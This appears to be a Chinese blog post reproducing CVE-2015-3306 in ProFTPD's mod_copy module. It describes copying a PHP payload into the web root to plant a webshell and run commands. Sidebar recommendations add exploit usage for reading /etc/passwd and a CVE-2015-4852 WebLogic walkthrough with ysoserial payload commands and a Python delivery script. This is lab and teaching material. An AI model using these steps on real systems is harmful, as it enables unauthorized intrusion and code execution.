cve-2015-3306复现

最新推荐文章于 2024-08-30 11:45:01 发布
原创 最新推荐文章于 2024-08-30 11:45:01 发布 · 3.8k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了CVE-2015-3306漏洞,该漏洞存在于ProFTPD 1.3.5版本中的mod_copy模块。远程攻击者可通过特定命令读取和写入任意文件,甚至执行远程代码。文章详细记录了漏洞的复现过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Cve-2015-3306

背景:
ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。
任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdline将PHP有效负载复制到网站目录,可以实现PHP远程代码执行。

复现:
启动服务
在这里插入图片描述
执行poc
在这里插入图片描述
挂了个小马上去
在这里插入图片描述
从流量中看是可以通过post传入命令
在这里插入图片描述
执行whoami测试
在这里插入图片描述
执行id测试
在这里插入图片描述

分析:
通过使用/ proc / self / cmdline将PHP的payload复制到网站目录
在这里插入图片描述
传参写入小马
在这里插入图片描述

Elwood Ying
关注
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试: http://127.0.0.1/pass.txt ###方法2: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /var/www/html 然后尝试: http:
propane:利用 proftpd 中的任意文件写入错误 (CVE-2015-3306) 尝试执行代码
07-22
丙烷 利用 ProFTPD 的 mod_copy 模块 (CVE-2015-3306) 中的任意文件写入错误并尝试执行代码。
cve-2015-3306-proftpd-vulfocus
c0529的博客
06-23 964
proftp是用于搭建基于ftp协议的应用软件ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。
vulfocus/proftpd-cve_2015_3306远程代码执行漏洞
weixin_68177269的博客
08-30 398
访问上传上去的后门,端口是开放的http的端口。一、使用exp直接传入后门。
关于phpstudy开启3306远程管理数据库的复现
weixin_63846774的博客
09-01 375
关于phpstudy开启3306远程管理数据库的复现
内网渗透命令浅谈
weixin_38116292的博客
05-11 651
即使命令也是区分大小写的(windows不区分,linux区分) windows和linux基本命令的对比 cd 打开目录 mkdir 创建目录 rmdir 删除目录 dir和ls,列文件 move和mv 移动文件 del和rm 删除文件 copy和cp 拷贝文件 type和cat 查看文件 echo 打印字符串 echo %cd% 和pwd 打印当前工作目录 findstr和grep 查找字符串 ===== kali也可以使用powershell 直接使...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
**Joomla CMS与CVE-2015-7857注入漏洞** Joomla是一款流行的开源内容管理系统(CMS),用于构建各种类型的网站,包括企业、新闻、博客等。它的强大功能和灵活性使其成为全球众多用户的首选。然而,随着广泛使用,...
CVE-2015-8660:这个代码包含了CVE-2015-8660漏洞的利用代码,还有注释,出现问题的源代码,打了补丁后的代码
03-23
**CVE-2015-8660详解:** CVE-2015-8660是一个安全漏洞,其影响的是特定版本的开源软件。这个漏洞在2015年被公开披露,并被赋予了CVE(Common Vulnerabilities and Exposures)编号,用以标识和跟踪该特定的安全...
ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞
weixin_33738578的博客
01-24 710
poc如下: #!/usr/bin/env python# coding=utf-8"""Site: http://www.beebeeto.com/Framework: https://github.com/n0tr00t/Beebeeto-framework"""import randomimport telnetlibfrom baseframe import BaseFramefrom ...
小伙子不懂事,写着玩的
qq_45981247的博客
05-05 1215
数据库安全,应用协议,中间件安全,框架安全
数据库漏洞(未授权访问+RCE)-Mysql+Hadoop
xiaoheizi的博客
07-09 1128
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。如我们在安装使用mysq数据库时,默认情况下就会开启mysql服务和服务默认端口3306。启动漏洞环境,访问漏洞地址http://123.58.224.8:32561 即可看到Hadoop YARN ResourceManager WebUI页面。猜测可能存在Mysql 身份认证绕过漏洞,于是尝试复现漏洞。漏洞利用:反弹shell。
mysql身份认证绕过漏洞复现CVE-2012-2122)
weixin_53730939的博客
03-12 1798
mysql身份认证绕过漏洞复现CVE-2012-2122)
漏洞CVE 2012-2122复现——Mysql身份验证绕过
人若有志,就不会在半坡停止。
08-25 1512
漏洞CVE 2012-2122复现——Mysql身份验证绕过
Kali系统MSF模块暴力破解MySQL弱口令漏洞
热门推荐
mooyuan的网络安全博客
11-24 1万+
攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。
【网络安全】浅谈数据库攻击复现及相关安全优化
HUANGXIN9898的博客
04-12 919
4、准备数据库服务器为了安全正式环境应该把数据库单独放一台服务器,只允许让应用服务器 IP 来访问数据库服务器,通过独立两者,就算其中一台发生问题,另一台也是好的,进一步降低了危险性。5、定时备份数据库开发定时备份功能,可以使用 Crontab,或者其他框架,设定周期备份数据,哪怕是数据丢失或被删除也可以快速恢复。
服务攻防-数据库-cve复现(Mysql cve-2012-2122、redis未授权访问漏洞、CouchDB垂直越权漏洞(CVE-2017-12635)、Couchdb 任意命令执行漏洞(CVE-
m0_74402888的博客
07-20 1241
cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务。config set dir /var/spool/cron/ //或者 /var/spool/cron/crontabs。
Funbox2靶场复现
hcufo的博客
09-06 127
记一次靶场详细复现过程
mysql 漏洞 2015_Oracle MySQL Server远程安全漏洞(CVE-2015-0411)
weixin_34570232的博客
01-21 976
发布日期:2015-01-20更新日期:2015-01-22受影响系统:Oracle MySQL Server <= 5.6.21Oracle MySQL Server <= 5.5.40描述:BUGTRAQ ID: 72191CVE(CAN) ID: CVE-2015-0411Oracle MySQL Server是一个轻量的关系型数据库系统。Oracle MySQL Server...
CVE-2015-4852复现
最新发布
04-01
### 关于 CVE-2015-4852 的概述 CVE-2015-4852 是 Oracle WebLogic Server 中的一个反序列化漏洞,攻击者可以通过发送特制的数据包来触发该漏洞并实现远程代码执行。此漏洞的根本原因在于 Java 序列化的不安全使用[^4]。 --- ### 复现 CVE-2015-4852 漏洞的条件与方法 #### 条件准备 为了成功复现 CVE-2015-4852 漏洞,需满足以下前提条件: 1. **目标环境配置** 需要安装受影响版本的 Oracle WebLogic Server(例如 10.3.6 或其他易受攻击的版本)。具体受影响范围可参考官方公告或相关文档[^4]。 2. **网络可达性** 攻击者的机器能够通过网络访问到目标服务器上的 T3 协议端口,默认为 `7001`。 3. **工具准备** 使用 ysoserial 工具生成恶意的序列化对象文件。ysoserial 是一种用于创建 Java 反序列化有效载荷的工具,支持多种 gadget 链以适应不同的场景和依赖库[^5]。 --- #### 实际操作过程 以下是基于上述条件的具体实施步骤: 1. **下载并编译 ysoserial** 获取最新版的 ysoserial 源码,并按照说明完成构建工作。命令如下所示: ```bash git clone https://github.com/ropgadget/ysoserial.git cd ysoserial mvn clean compile assembly:single ``` 2. **生成 payload 文件** 利用 ysoserial 创建针对特定类型的反序列化漏洞的有效负载。假设我们希望弹回 shell,则可以运行下面这条指令: ```bash java -jar target/ysoserial.jar CommonsCollections1 "ping -c 5 192.168.x.y" > exploit.bin ``` 这里选择了 `CommonsCollections1` 类型作为 gadgets chain;实际应用中可能需要尝试不同选项直至找到适合当前服务端环境的最佳组合[^5]。 3. **利用 Python 脚本投递 payload** 编写简单的客户端程序模拟向存在缺陷的服务发起请求行为。示例脚本如下: ```python import socket host = 'target_host_ip' port = 7001 with open('exploit.bin', 'rb') as f: data = f.read() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host, port)) s.send(data) response = s.recv(1024) print(response.decode()) finally: s.close() ``` 4. **验证效果** 如果一切正常,在目标主机上应该观察到由所指定命令产生的相应活动迹象——比如 ICMP 请求被发出或者新的进程启动等等情况发生。 --- ### 安全建议 尽管研究此类高危漏洞有助于提升防护意识和技术能力,但在真实世界环境中切勿滥用这些技术手段去危害他人利益。始终遵循道德准则以及法律法规框架下开展学习实践活动才是正道所在! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值